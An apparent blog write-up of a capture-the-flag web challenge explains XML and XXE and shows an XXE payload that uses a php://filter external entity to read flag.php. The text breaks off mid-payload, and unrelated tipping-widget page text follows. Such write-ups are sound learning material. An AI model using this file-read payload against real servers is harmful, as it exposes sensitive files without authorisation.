WEB-XML与XXE漏洞-伪协议

本文探讨了XML与XXE漏洞,重点介绍了如何利用伪协议进行攻击,包括读取用户密码、通过上传文件执行XXE、使用PHP伪协议读取任意文件以及检测目标IP端口开放情况。在Web安全领域,XXE漏洞常常被用于获取敏感信息,而了解这些利用方式对于防止和修复此类漏洞至关重要。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

在做unctf时遇到一道web题,是xml的xxe漏洞(Do you like xml),当时没做出来,没反应过来这个知识点,后来经人指点稍微理解了一些关于这个的漏洞,又在判作业中看到了这个知识点,所以决定记录下来


XML与XXE漏洞及伪协议利用

XML是用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。
在这里插入图片描述
这道题可以通过伪协议读取flag.php的内容,从而getflag

<?xml version="1.0"?>
<!DOCTYPE user [
    <!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php">
]>
<user>
    
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值